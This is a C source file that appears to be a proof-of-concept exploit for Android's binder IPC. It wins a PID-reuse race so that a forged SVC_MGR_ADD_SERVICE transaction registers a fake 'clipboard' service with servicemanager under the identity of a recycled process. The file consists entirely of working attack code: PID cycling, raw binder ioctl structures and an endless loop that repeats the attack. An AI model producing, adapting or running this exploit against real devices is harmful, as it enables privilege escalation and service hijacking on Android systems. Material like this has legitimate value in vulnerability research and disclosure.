#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <errno.h>
#include <time.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>

#define READ_END 0
#define WRITE_END 1

void swaitpid(pid_t pid) {
	int status;
	if (waitpid(pid, &status, 0) != pid)
		err(1, "waitpid");
}

void writec(int *pipe, char c) {
	errno = 0;
	if (write(pipe[WRITE_END], &c, 1) != 1)
		err(1, "writec");
}

char readc(int *pipe) {
	errno = 0;
	char c;
	if (read(pipe[READ_END], &c, 1) != 1)
		err(1, "readc");
	return c;
}

int do_tkill(int tid, int sig) {
	return syscall(__NR_tkill, tid, sig);
}

/*
 * makes the kernel reuse the target pid so that after the method returns, the
 * next fork is going to use target+1 as pid (if that pid is currently unused)
 */
void cycle_to_pid(pid_t target) {
	puts("cycle_to_pid...");
	pid_t child;
	do {
		child = fork();
		if (child == -1)
			err(1, "fork");
		if (child == 0) _exit(0);
		swaitpid(child);
	} while (child != target);
	puts("cycle_to_pid done");
}

void store_string16(uint16_t *dst, char *src) {
	while (1) {
		*dst = *src;
		if (*src == '\0')
			return;
		src++;
		dst++;
	}
}


/* binder constants */
#define SVC_MGR_NAME "android.os.IServiceManager"
#define BINDER_SERVICE_MANAGER  0U
struct flat_binder_object {
	uint32_t type;
	uint32_t flags;
	union {
		uint64_t binder;
		uint32_t handle;
	};
	uint64_t cookie;
};
#define B_PACK_CHARS(c1, c2, c3, c4) \
	((((c1)<<24)) | (((c2)<<16)) | (((c3)<<8)) | (c4))
#define B_TYPE_LARGE 0x85
enum {
	BINDER_TYPE_BINDER	= B_PACK_CHARS('s', 'b', '*', B_TYPE_LARGE),
	BINDER_TYPE_WEAK_BINDER	= B_PACK_CHARS('w', 'b', '*', B_TYPE_LARGE),
	BINDER_TYPE_HANDLE	= B_PACK_CHARS('s', 'h', '*', B_TYPE_LARGE),
	BINDER_TYPE_WEAK_HANDLE	= B_PACK_CHARS('w', 'h', '*', B_TYPE_LARGE),
	BINDER_TYPE_FD		= B_PACK_CHARS('f', 'd', '*', B_TYPE_LARGE),
};
enum {
	FLAT_BINDER_FLAG_PRIORITY_MASK = 0xff,
	FLAT_BINDER_FLAG_ACCEPTS_FDS = 0x100,
};
struct binder_transaction_data {
	union {
		uint32_t	handle;
		uint64_t ptr;
	} target;
	uint64_t cookie;
	uint32_t code;

	/* General information about the transaction. */
	uint32_t flags;
	pid_t		sender_pid;
	uid_t		sender_euid;
	uint64_t	data_size;	/* number of bytes of data */
	uint64_t	offsets_size;	/* number of bytes of offsets */

	/* If this transaction is inline, the data immediately
	 * follows here; otherwise, it ends with a pointer to
	 * the data buffer.
	 */
	union {
		struct {
			/* transaction data */
			uint64_t	buffer;
			/* offsets from buffer to flat_binder_object structs */
			uint64_t	offsets;
		} ptr;
		uint8_t	buf[8];
	} data;
};
int BC_TRANSACTION = _IOW('c', 0, struct binder_transaction_data);
enum {
    /* Must match definitions in IBinder.h and IServiceManager.h */
    PING_TRANSACTION  = B_PACK_CHARS('_','P','N','G'),
    SVC_MGR_GET_SERVICE = 1,
    SVC_MGR_CHECK_SERVICE,
    SVC_MGR_ADD_SERVICE,
    SVC_MGR_LIST_SERVICES,
};
struct binder_write_read {
	uint64_t	write_size;	/* bytes to write */
	uint64_t	write_consumed;	/* bytes consumed by driver */
	uint64_t	write_buffer;
	uint64_t	read_size;	/* bytes to read */
	uint64_t	read_consumed;	/* bytes consumed by driver */
	uint64_t	read_buffer;
};
#define BINDER_WRITE_READ		_IOWR('b', 1, struct binder_write_read)


#define BINDER_MAPSIZE (128 * 1024)
#define SERVICENAME "clipboard"
#define ACTMGR_SVC "android.app.IActivityManager"


int binder_fd;
char *binder_mem;
int master_to_subchild_pipe[2];
int subchild_to_master_pipe[2];

void attempt_service_creation() {
	/* register the service and quit; do NOT wait for a response */
	struct {
		uint32_t strict_policy;
		uint32_t name_len;
		uint16_t name[(sizeof(SVC_MGR_NAME)+1)&~1];
		uint32_t servicename_len;
		uint16_t servicename[(sizeof(SERVICENAME)+1)&~1];
		struct flat_binder_object service_object;
		uint32_t allow_isolated;
	} __attribute__((packed)) databuf = {
		.strict_policy = 0,
		.name_len = sizeof(SVC_MGR_NAME) - 1,
		/* fill in name below */
		.servicename_len = sizeof(SERVICENAME) - 1,
		/* fill in servicename below */
		.service_object = {
			.type = BINDER_TYPE_BINDER,
			.flags = 0x7f | FLAT_BINDER_FLAG_ACCEPTS_FDS,
			.binder = 0x42,
			.cookie = 0
		},
		.allow_isolated = 1
	};
	uint64_t offsets[1] = { offsetof(typeof(databuf), service_object) };
	store_string16(databuf.name, SVC_MGR_NAME);
	store_string16(databuf.servicename, SERVICENAME);
	struct {
		uint32_t cmd;
		struct binder_transaction_data txn;
	} __attribute__((packed)) writebuf = {
		.cmd = BC_TRANSACTION,
		.txn = {
			.target = { .handle = BINDER_SERVICE_MANAGER },
			.code = SVC_MGR_ADD_SERVICE,
			.flags = 0,
			.data_size = sizeof(databuf),
			.offsets_size = sizeof(offsets),
			.data = {
				.ptr = {
					.buffer = (uint64_t)&databuf,
					.offsets = (uint64_t)offsets
				}
			}
		}
	};
	struct binder_write_read bwr = {
		.write_size = sizeof(writebuf),
		.write_consumed = 0,
		.write_buffer = (uintptr_t)&writebuf,
		.read_size = 0,
		.read_consumed = 0,
		.read_buffer = 0
	};
	if (ioctl(binder_fd, BINDER_WRITE_READ, &bwr))
		err(1, "BINDER_WRITE_READ failed");
}

void child_fn(void) {
	binder_fd = open("/dev/binder", O_RDWR);
	if (binder_fd == -1)
		err(1, "unable to open binder");
	binder_mem = mmap(NULL, BINDER_MAPSIZE, PROT_READ, MAP_PRIVATE, binder_fd, 0);
	if (binder_mem == MAP_FAILED)
		err(1, "mmap binder");

	pid_t subchild = fork();
	if (subchild == -1)
		err(1, "subchild");
	if (subchild == 0) {
		if (readc(master_to_subchild_pipe) != 'K')
			_exit(0);
		close(master_to_subchild_pipe[READ_END]);
		/* start of highly racy stuff */
		attempt_service_creation();
		close(subchild_to_master_pipe[WRITE_END]);
		_exit(0);
	}
	_exit(0);
}

/* for some reason, clone() didn't work for me, and afaik Android disables unix domain sockets... so this is a bit more complicated */
void run_attack(void) {
	puts("trying attack...");

	if (pipe(master_to_subchild_pipe))
		err(1, "pipe");
	if (pipe(subchild_to_master_pipe))
		err(1, "pipe");

	pid_t unused_pid = fork();
	if (unused_pid == -1)
		err(1, "fork");
	if (unused_pid == 0)
		_exit(0);

	pid_t child_pid = fork();
	if (child_pid == -1)
		err(1, "fork");
	if (child_pid == 0) {
		child_fn();
		_exit(0);
	}

	close(master_to_subchild_pipe[READ_END]);
	close(subchild_to_master_pipe[WRITE_END]);

	swaitpid(unused_pid);
	// wait for child to become a zombie; polling procfs instead would also work and be faster
	sleep(1);

	if (child_pid != unused_pid + 1) {
		puts("bad luck: child_pid != unused_pid + 1");
		writec(master_to_subchild_pipe, '!');
		close(master_to_subchild_pipe[WRITE_END]);
		close(subchild_to_master_pipe[READ_END]);
		swaitpid(child_pid);
		return;
	}
	puts("child_pid == unused_pid + 1");

	/* prepare for fast pid reuse. `- 16` is a dirty hack because something apparently spawns
	 * around 16 short-lived threads in the time interval between cycle_to_pid's end and the
	 * worker thread creation in system_server.
	 */
	cycle_to_pid(unused_pid - 16);
	writec(master_to_subchild_pipe, 'K');
	char dummyc;
	if (read(subchild_to_master_pipe[READ_END], &dummyc, 1) == -1) /* expected result: 0, pipe end closed */
		err(1, "read subchild_to_master_pipe");
	swaitpid(child_pid);
	sleep(1); // assumes that the system has been patched with the raciness enhancement patch
	if (write(1, "#\n", 2) != 2)
		err(1, "request for new thread failed");
	sleep(5);

	close(master_to_subchild_pipe[WRITE_END]);
	close(subchild_to_master_pipe[READ_END]);
	printf("pid of last try: %d\n", (int)child_pid);
}

int main(int argc, char **argv) {
	dup2(1, 2);
	setbuf(stdout, NULL);
	setbuf(stderr, NULL);
	while (1) {
		run_attack();
	}
}
